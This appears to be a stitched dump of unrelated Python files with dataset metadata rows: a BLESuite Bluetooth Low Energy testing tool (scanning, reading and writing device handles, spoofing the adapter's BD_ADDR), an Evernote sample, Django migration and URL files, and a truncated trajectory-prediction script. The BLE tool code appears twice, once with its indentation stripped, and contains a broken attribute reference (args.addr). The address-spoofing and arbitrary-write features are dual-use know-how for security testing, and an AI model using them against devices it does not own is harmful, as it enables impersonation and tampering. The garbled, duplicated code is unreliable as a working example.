                                "(including associated descriptors). Note: This scan takes longer than the service scan",
                   'servicescan': 'Scan specified address for all services, characteristics, and descriptors. ',
                   'read': "Read value from specified device and handle",
                   'write': "Write value to specific handle on a device. Specify the --data or --files options"
                            "to set the payload data. Only data or file data can be specified, not both"
                            "(data submitted using the data flag takes precedence over data in files).",
                   'subscribe': "Write specified value (0000,0100,0200,0300) to chosen handle and initiate listener.",
                   'spoof': 'Modify your Bluetooth adapter\'s BT_ADDR. Use --address to set the address. Some chipsets'
                            ' may not be supported.'}
    address_type_choices = ['public', 'random']
    parser = argparse.ArgumentParser(prog="blesuite",
                                     description='Bluetooh Low Energy (BTLE) tool set for communicating and '
                                                 'testing BTLE devices on the application layer.')  # ,
    # formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('command', metavar='command', type=str, nargs=1,
                        action='store', choices=cmd_choices.keys(),
                        help='BLESuite command you would like to execute.' +
                             'The following are the currently supported commands:\n' +
                             '\n'.join(['\033[1m{}\033[0m: {}'.format(k, v) for k, v in cmd_choices.iteritems()]))
    parser.add_argument('--async', action='store_true', help='\033[1m<read, write>\033[0m '
                                                             'Enable asynchronous writing/reading. Any output'
                                                             'will be displayed when received. This prevents'
                                                             'blocking.')
    parser.add_argument('--skip-device-info-query', action='store_true', help='\033[1m<smartscan>\033[0m '
                                                                              'When scanning a device, specify this flag'
                                                                              'to force smartscan to skip querying the device'
                                                                              'for common information such as device name. This'
                                                                              'is helpful when devices do not implement these services.')
    parser.add_argument('--smart-read', action='store_true', help='\033[1m<smartscan>\033[0m '
                                                                  'When scanning a device, specify this flag'
                                                                  'to force smartscan to attempt to read'
                                                                  'from each discovered characteristic descriptor.'
                                                                  'Note: This will increase scan time to handle'
                                                                  'each read operation.')
    parser.add_argument('-m', '--mode', metavar='mode', default=[1],
                        type=int, nargs=1, required=False,
                        action='store', help='\033[1m<subscribe>\033[0m '
                                             'Selects which configuration to set'
                                             'for a characteristic configuration descriptor.'
                                             '0=off,1=notifications,2=indications,'
                                             '3=notifications and inidications')
    parser.add_argument('--timeout', metavar='timeout', default=[5],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<lescan, read, write>\033[0m '
                             'Timeout (in seconds) for attempting to retrieve data from a device '
                             '(ie reading from a descriptor handle). (Default: 5 seconds)')
    parser.add_argument('--subscribe-timeout', metavar='subscribe-timeout', default=[None],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<subscribe>\033[0m '
                             'Time (in seconds) for attempting to retrieve data from a device '
                             'when listening for notifications or indications. (Default: Indefinite)')
    # Device for discovery service can be specified
    parser.add_argument('-i', '--adapter', metavar='adapter', default=[0],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<all commands>\033[0m '
                             'Specify which Bluetooth adapter should be used. '
                             'These can be found by running (hcitool dev).')
    parser.add_argument('-d', '--address', metavar='address', type=validators.validate_bluetooth_address_cli, nargs=1,
                        required=False, action='store',
                        help='\033[1m<all commands>\033[0m '
                             'Bluetooth address (BD_ADDR) of the target Bluetooth device')
    parser.add_argument('-a', '--handles', metavar='handles', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<read, write>\033[0m '
                             'Hexadecimal handel list of characteristics to access (ex: 005a 006b). If '
                             'you want to access the value of a characteristic, use the handle_value '
                             'value from the service scan.')
    parser.add_argument('-u', '--uuids', metavar='uuids', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<read>\033[0m '
                             'UUID list of characteristics to access. If '
                             'you want to access the value of a characteristic, use the UUID '
                             'value from the service scan.')
    parser.add_argument('--data', metavar='data', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<write>\033[0m '
                             'Strings that you want to write to a handle (separated by spaces).')
    parser.add_argument('--files', metavar='files', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<write>\033[0m '
                             'Files that contain data to write to handle (separated by spaces)')
    parser.add_argument('--payload-delimiter', metavar='payload-delimiter', type=str, nargs=1,
                        required=False, action='store', default=["EOF"],
                        help='\033[1m<write>\033[0m '
                             'Specify a delimiter (string) to use when specifying data for BLE payloads.'
                             'For instance, if I want to send packets with payloads in a file separated'
                             'by a comma, supply \'--payload-delimiter ,\'. Supply EOF if you want the entire contents'
                             'of a file sent. (Default: EOF)')
    parser.add_argument("-t", '--address-type', metavar='address-type', type=str, nargs=1,
                        required=False, action='store', default=['public'], choices=address_type_choices,
                        help='\033[1m<all commands>\033[0m '
                             'Type of BLE address you want to connect to [public | random].')
    parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
    parser.add_argument('--debug', action='store_true', help='\033[1m<all commands>\033[0m '
                                                             'Enable logging for debug statements.')
    return parser.parse_args()
def process_args(args):
"""
Process command line tool arguments parsed by argparse
and call appropriate bleSuite functions.
:param args: parser.parse_args()
:return:
"""
command = args.command[0]
if args.debug:
logging.basicConfig(level=logging.DEBUG)
timeout = args.timeout[0] * 1000 # convert seconds to ms
if command == 'spoof':
import bdaddr
if args.address[0] == "":
print "Please specify an address to spoof."
else:
logger.debug("About to spoof to address %s for adapter %s" % (args.address[0], args.adapter[0]))
ret = bdaddr.bdaddr(("hci"+str(args.adapter[0])), args.address[0])
if ret == -1:
raise ValueError('Spoofing failed. Your device may not be supported.')
if command == 'scan':
print "BTLE Scan beginning"
with BLEConnectionManager(args.adapter[0], 'central') as connection_manager:
discovered = connection_manager.scan(timeout)
print "Discovered:"
for i in discovered.keys():
print "\t", i, "(public)" if discovered[i][0] == 0 else "(random)"
for h, j in enumerate(discovered[i][1]):
gap = connection_manager.decode_gap_data(str(discovered[i][1][h]))
info = connection_manager.generate_gap_data_dict(gap)
for k in info.keys():
print "\t\t", k + ":"
print "\t\t\t", info[k]
if command == 'smartscan':
print "BTLE Smart Scan beginning"
device = ble_run_smart_scan(args.address[0], args.adapter[0],
args.address_type[0], skip_device_info_query=args.skip_device_info_query,
attempt_read=args.smart_read,
timeout=timeout)
if command == 'servicescan':
print "BTLE Scanning Services"
ble_service_scan(args.address[0], args.adapter[0],
args.address_type[0])
if command == 'read':
if len(args.handles) <= 0 and len(args.uuids) <= 0:
print "ERROR: No handles or UUIDs supplied for read operation."
return
print "Reading value from handle or UUID"
if args.async:
uuidData, handleData = ble_service_read_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1], False)'''
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), True)'''
else:
uuidData, handleData = ble_service_read(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
if command == 'write':
if len(args.handles) <= 0:
print "ERROR: No handles supplied for write operation. Note: Write operation does not support use of UUIDs."
return
print "Writing value to handle"
if args.async:
logger.debug("Async Write")
if len(args.data) > 0:
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data,
timeout=timeout)
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write_async(args.addr[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
utils.print_helper.print_data_and_hex(dataTuple[2], False, prefix="\t")
print "Output:"
#if tuple[1][0] is a string, it means our cmdLineToolWrapper removed the GattResponse object
#due to a timeout, else we grab the GattResponse and its response data
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False, prefix="\t")
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), False, prefix="\t")
else:
logger.debug("Sync Write")
print args.data
if len(args.data) > 0:
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data, timeout=timeout)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
print_data_and_hex([dataTuple[2]], False, prefix="\t")
print "Output:"
print_data_and_hex(dataTuple[1], False, prefix="\t")
if command == 'subscribe':
print "Subscribing to device"
if args.subscribe_timeout[0] is not None:
timeout = args.subscribe_timeout[0] * 1000
else:
timeout = None
ble_handle_subscribe(args.address[0], args.handles, args.adapter[0],
args.address_type[0], args.mode[0], timeout)
return
def main():
    """Entry point for the BLESuite command line tool.

    Parses the command line, dispatches to the requested BLE action, then
    logs the parsed arguments for debugging.

    :return: None
    """
    parsed = parse_command()
    process_args(parsed)
    logger.debug("Args: %s" % parsed)
| 53.214092 | 120 | 0.503718 | import argparse
from blesuite.connection_manager import BLEConnectionManager
from blesuite_wrapper import ble_service_read, ble_service_read_async, ble_service_write, \
ble_handle_subscribe, ble_service_scan, ble_service_write_async, ble_run_smart_scan
from blesuite import utils
from blesuite.utils.print_helper import print_data_and_hex
from blesuite.utils import validators
import logging
__version__ = "2.0"
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def parse_command():
    """
    Creates parser and parses command line tool call.

    NOTE(review): this module is Python 2 code (``cmd_choices.iteritems()``
    below, ``print`` statements elsewhere in the file).  The ``--async`` flag
    produces an ``args.async`` attribute, whose name collides with the
    ``async`` keyword from Python 3.7 onward.  The "Bluetooh"/"handel" typos
    in the user-facing help text are left as-is here.

    :return: parsed arguments (an argparse.Namespace)
    """
    global __version__
    #Dictionary of available commands. Place new commands here
    cmd_choices = {'scan': "Scan for BTLE devices",
                   'smartscan': "Scan specified BTLE device for device information, services, characteristics "
                                "(including associated descriptors). Note: This scan takes longer than the service scan",
                   'servicescan': 'Scan specified address for all services, characteristics, and descriptors. ',
                   'read': "Read value from specified device and handle",
                   'write': "Write value to specific handle on a device. Specify the --data or --files options"
                            "to set the payload data. Only data or file data can be specified, not both"
                            "(data submitted using the data flag takes precedence over data in files).",
                   'subscribe': "Write specified value (0000,0100,0200,0300) to chosen handle and initiate listener.",
                   'spoof': 'Modify your Bluetooth adapter\'s BT_ADDR. Use --address to set the address. Some chipsets'
                            ' may not be supported.'}
    address_type_choices = ['public', 'random']
    parser = argparse.ArgumentParser(prog="blesuite",
                                     description='Bluetooh Low Energy (BTLE) tool set for communicating and '
                                                 'testing BTLE devices on the application layer.')  # ,
    # formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('command', metavar='command', type=str, nargs=1,
                        action='store', choices=cmd_choices.keys(),
                        help='BLESuite command you would like to execute.' +
                             'The following are the currently supported commands:\n' +
                             '\n'.join(['\033[1m{}\033[0m: {}'.format(k, v) for k, v in cmd_choices.iteritems()]))
    parser.add_argument('--async', action='store_true', help='\033[1m<read, write>\033[0m '
                                                             'Enable asynchronous writing/reading. Any output'
                                                             'will be displayed when received. This prevents'
                                                             'blocking.')
    parser.add_argument('--skip-device-info-query', action='store_true', help='\033[1m<smartscan>\033[0m '
                                                                              'When scanning a device, specify this flag'
                                                                              'to force smartscan to skip querying the device'
                                                                              'for common information such as device name. This'
                                                                              'is helpful when devices do not implement these services.')
    parser.add_argument('--smart-read', action='store_true', help='\033[1m<smartscan>\033[0m '
                                                                  'When scanning a device, specify this flag'
                                                                  'to force smartscan to attempt to read'
                                                                  'from each discovered characteristic descriptor.'
                                                                  'Note: This will increase scan time to handle'
                                                                  'each read operation.')
    parser.add_argument('-m', '--mode', metavar='mode', default=[1],
                        type=int, nargs=1, required=False,
                        action='store', help='\033[1m<subscribe>\033[0m '
                                             'Selects which configuration to set'
                                             'for a characteristic configuration descriptor.'
                                             '0=off,1=notifications,2=indications,'
                                             '3=notifications and inidications')
    parser.add_argument('--timeout', metavar='timeout', default=[5],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<lescan, read, write>\033[0m '
                             'Timeout (in seconds) for attempting to retrieve data from a device '
                             '(ie reading from a descriptor handle). (Default: 5 seconds)')
    parser.add_argument('--subscribe-timeout', metavar='subscribe-timeout', default=[None],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<subscribe>\033[0m '
                             'Time (in seconds) for attempting to retrieve data from a device '
                             'when listening for notifications or indications. (Default: Indefinite)')
    # Device for discovery service can be specified
    parser.add_argument('-i', '--adapter', metavar='adapter', default=[0],
                        type=int, nargs=1,
                        required=False, action='store',
                        help='\033[1m<all commands>\033[0m '
                             'Specify which Bluetooth adapter should be used. '
                             'These can be found by running (hcitool dev).')
    parser.add_argument('-d', '--address', metavar='address', type=validators.validate_bluetooth_address_cli, nargs=1,
                        required=False, action='store',
                        help='\033[1m<all commands>\033[0m '
                             'Bluetooth address (BD_ADDR) of the target Bluetooth device')
    parser.add_argument('-a', '--handles', metavar='handles', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<read, write>\033[0m '
                             'Hexadecimal handel list of characteristics to access (ex: 005a 006b). If '
                             'you want to access the value of a characteristic, use the handle_value '
                             'value from the service scan.')
    parser.add_argument('-u', '--uuids', metavar='uuids', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<read>\033[0m '
                             'UUID list of characteristics to access. If '
                             'you want to access the value of a characteristic, use the UUID '
                             'value from the service scan.')
    parser.add_argument('--data', metavar='data', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<write>\033[0m '
                             'Strings that you want to write to a handle (separated by spaces).')
    parser.add_argument('--files', metavar='files', type=str, nargs="+",
                        required=False, action='store', default=[],
                        help='\033[1m<write>\033[0m '
                             'Files that contain data to write to handle (separated by spaces)')
    parser.add_argument('--payload-delimiter', metavar='payload-delimiter', type=str, nargs=1,
                        required=False, action='store', default=["EOF"],
                        help='\033[1m<write>\033[0m '
                             'Specify a delimiter (string) to use when specifying data for BLE payloads.'
                             'For instance, if I want to send packets with payloads in a file separated'
                             'by a comma, supply \'--payload-delimiter ,\'. Supply EOF if you want the entire contents'
                             'of a file sent. (Default: EOF)')
    parser.add_argument("-t", '--address-type', metavar='address-type', type=str, nargs=1,
                        required=False, action='store', default=['public'], choices=address_type_choices,
                        help='\033[1m<all commands>\033[0m '
                             'Type of BLE address you want to connect to [public | random].')
    parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
    parser.add_argument('--debug', action='store_true', help='\033[1m<all commands>\033[0m '
                                                             'Enable logging for debug statements.')
    return parser.parse_args()
def process_args(args):
"""
Process command line tool arguments parsed by argparse
and call appropriate bleSuite functions.
:param args: parser.parse_args()
:return:
"""
command = args.command[0]
if args.debug:
logging.basicConfig(level=logging.DEBUG)
timeout = args.timeout[0] * 1000 # convert seconds to ms
if command == 'spoof':
import bdaddr
if args.address[0] == "":
print "Please specify an address to spoof."
else:
logger.debug("About to spoof to address %s for adapter %s" % (args.address[0], args.adapter[0]))
ret = bdaddr.bdaddr(("hci"+str(args.adapter[0])), args.address[0])
if ret == -1:
raise ValueError('Spoofing failed. Your device may not be supported.')
if command == 'scan':
print "BTLE Scan beginning"
with BLEConnectionManager(args.adapter[0], 'central') as connection_manager:
discovered = connection_manager.scan(timeout)
print "Discovered:"
for i in discovered.keys():
print "\t", i, "(public)" if discovered[i][0] == 0 else "(random)"
for h, j in enumerate(discovered[i][1]):
gap = connection_manager.decode_gap_data(str(discovered[i][1][h]))
info = connection_manager.generate_gap_data_dict(gap)
for k in info.keys():
print "\t\t", k + ":"
print "\t\t\t", info[k]
if command == 'smartscan':
print "BTLE Smart Scan beginning"
device = ble_run_smart_scan(args.address[0], args.adapter[0],
args.address_type[0], skip_device_info_query=args.skip_device_info_query,
attempt_read=args.smart_read,
timeout=timeout)
if command == 'servicescan':
print "BTLE Scanning Services"
ble_service_scan(args.address[0], args.adapter[0],
args.address_type[0])
if command == 'read':
if len(args.handles) <= 0 and len(args.uuids) <= 0:
print "ERROR: No handles or UUIDs supplied for read operation."
return
print "Reading value from handle or UUID"
if args.async:
uuidData, handleData = ble_service_read_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1], False)'''
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
'''
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False)
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), True)'''
else:
uuidData, handleData = ble_service_read(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.uuids, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print_data_and_hex(dataTuple[1], False)
for dataTuple in uuidData:
print "\nUUID:", dataTuple[0]
print_data_and_hex(dataTuple[1], False)
if command == 'write':
if len(args.handles) <= 0:
print "ERROR: No handles supplied for write operation. Note: Write operation does not support use of UUIDs."
return
print "Writing value to handle"
if args.async:
logger.debug("Async Write")
if len(args.data) > 0:
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data,
timeout=timeout)
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write_async(args.addr[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write_async(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet,
timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
utils.print_helper.print_data_and_hex(dataTuple[2], False, prefix="\t")
print "Output:"
#if tuple[1][0] is a string, it means our cmdLineToolWrapper removed the GattResponse object
#due to a timeout, else we grab the GattResponse and its response data
if isinstance(dataTuple[1][0], str):
utils.print_helper.print_data_and_hex(dataTuple[1], False, prefix="\t")
else:
utils.print_helper.print_data_and_hex(dataTuple[1][1].received(), False, prefix="\t")
else:
logger.debug("Sync Write")
print args.data
if len(args.data) > 0:
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, args.data, timeout=timeout)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
elif args.payload_delimiter[0] == 'EOF':
logger.debug("Payload Delimiter: EOF")
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
logger.debug("Reading file: %s", dataFile)
f = open(dataFile, 'r')
dataSet.append(f.read())
f.close()
logger.debug("Sending data set: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
logger.debug("Received data: %s" % handleData)
'''for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
utils.print_helper.print_data_and_hex(dataTuple[1], False)'''
else:
logger.debug("Payload Delimiter: %s", args.payload_delimiter[0])
dataSet = []
for dataFile in args.files:
if dataFile is None:
continue
f = open(dataFile, 'r')
data = f.read()
f.close()
data = data.split(args.payload_delimiter[0])
dataSet.extend(data)
logger.debug("Sending dataSet: %s" % dataSet)
handleData = ble_service_write(args.address[0], args.adapter[0],
args.address_type[0],
args.handles, dataSet, timeout=timeout)
for dataTuple in handleData:
print "\nHandle:", "0x" + dataTuple[0]
print "Input:"
print_data_and_hex([dataTuple[2]], False, prefix="\t")
print "Output:"
print_data_and_hex(dataTuple[1], False, prefix="\t")
if command == 'subscribe':
print "Subscribing to device"
if args.subscribe_timeout[0] is not None:
timeout = args.subscribe_timeout[0] * 1000
else:
timeout = None
ble_handle_subscribe(args.address[0], args.handles, args.adapter[0],
args.address_type[0], args.mode[0], timeout)
return
def main():
    """Entry point for the BLESuite command line tool.

    Parses the command line, dispatches to the requested BLE action, then
    logs the parsed arguments for debugging.

    :return: None
    """
    parsed = parse_command()
    process_args(parsed)
    logger.debug("Args: %s" % parsed)
| 0 | 0 | 0 |
39aeba465593157cc9fb66cd31b7e29f8c8eba57 | 370 | py | Python | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | sample/sample1_make_notebook.py | mtb-beta/evernote-api-sample | ff441da01b7c8075ad31fca7d22127fe4ceb7866 | [
"MIT"
] | null | null | null | """
NOTE: ノートブックを作成するサンプル
"""
from decouple import config
from pyevernote import EvernoteApp
TOKEN = config("EVERNOTE_DEVELOPPER_TOKEN")
USE_SANDBOX = config("USE_SANDBOX", True, cast=bool)
if __name__ == "__main__":
main()
| 20.555556 | 68 | 0.751351 | """
NOTE: ノートブックを作成するサンプル
"""
from decouple import config
from pyevernote import EvernoteApp
TOKEN = config("EVERNOTE_DEVELOPPER_TOKEN")
USE_SANDBOX = config("USE_SANDBOX", True, cast=bool)
def main():
    """Create a sample notebook on the configured Evernote account."""
    app = EvernoteApp(token=TOKEN, use_sandbox=USE_SANDBOX)
    app.create_notebook("My Sample Notebook3")
if __name__ == "__main__":
main()
| 115 | 0 | 23 |
93c19bda05ff270d52ae3931fc78f2d516181331 | 422 | py | Python | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | 1 | 2021-05-09T09:55:54.000Z | 2021-05-09T09:55:54.000Z | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | null | null | null | avishan/migrations/0005_baseuser_language.py | Afshari9978/django-avishan | 67b997e1063a1f2cf17699eaa292a98844aa0fe9 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-02-15 22:28
from django.db import migrations, models
| 22.210526 | 66 | 0.620853 | # Generated by Django 3.0.3 on 2020-02-15 22:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add a ``language`` field to ``BaseUser``."""

    dependencies = [
        ('avishan', '0004_usergroup_authenticate_with_phone_otp'),
    ]
    operations = [
        # New CharField defaulting to English ('EN') for existing rows.
        migrations.AddField(
            model_name='baseuser',
            name='language',
            field=models.CharField(default='EN', max_length=255),
        ),
    ]
| 0 | 308 | 23 |
c36aea22e9c375be0d8543ddc1eba0ff9f8acd15 | 258 | py | Python | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | students/K33422/laboratory_works/Daria Plotskaya/lab_2/users/urls.py | olticher/ITMO_ICT_WebDevelopment_2021-2022 | 3de8728c29638d6733ad0664bf13e0d1eccae899 | [
"MIT"
] | null | null | null | from django.urls import path
from django.contrib.auth.views import LoginView
from .views import UserCreateFormView
urlpatterns = [
path("login/", LoginView.as_view(), name="login"),
path("register/", UserCreateFormView.as_view(), name="register")
]
| 28.666667 | 68 | 0.744186 | from django.urls import path
from django.contrib.auth.views import LoginView
from .views import UserCreateFormView
urlpatterns = [
path("login/", LoginView.as_view(), name="login"),
path("register/", UserCreateFormView.as_view(), name="register")
]
| 0 | 0 | 0 |
4d0fba564fa46a0b48e5aa0c5c73cd2775df2ea9 | 15,765 | py | Python | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | 2 | 2018-09-27T06:57:28.000Z | 2019-07-13T12:15:48.000Z | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | null | null | null | CLOUD_ML_newaccuracy_4person.py | qqxx6661/Trajectory-prediction | c5f783bdbb14c98e9d6be60c1624c65b9110b6b3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
import numpy as np
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn import linear_model
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
import time
if __name__ == '__main__':
glo_start = time.time()
test_file = "gallery/15-21/15-21_person_1_ML.csv"
# 180s
# train_file = ['gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv']
# 360s
train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv']
# 720s
# train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
# 'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv',
# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv', 'gallery/14-32/14-32_person_0_ML.csv',
# 'gallery/14-32/14-32_person_1_ML.csv', 'gallery/14-32/14-32_person_2_ML.csv',]
# 720s
# train_file = ['gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv']
# 3480s
# train_file = ['gallery/14-08/14-08_person_0_ML.csv', 'gallery/14-08/14-08_person_1_ML.csv',
# 'gallery/14-08/14-08_person_2_ML.csv',
# 'gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv',
# 'gallery/14-14/14-14_person_0_ML.csv', 'gallery/14-14/14-14_person_1_ML.csv',
# 'gallery/14-14/14-14_person_2_ML.csv',
